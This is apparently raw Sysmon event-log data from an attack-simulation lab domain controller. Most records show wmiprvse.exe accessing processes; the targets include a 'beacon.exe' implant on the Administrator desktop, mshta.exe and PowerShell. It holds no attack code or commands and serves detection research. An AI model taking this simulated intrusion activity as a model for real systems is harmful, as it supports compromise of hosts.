10341000x80000000000000002239060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002239050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.826{05ADC7E1-6D98-603E-9FAA-00000000AD01}13544\PSHost.132591776246824744.13544.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002239049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.826{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.810{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT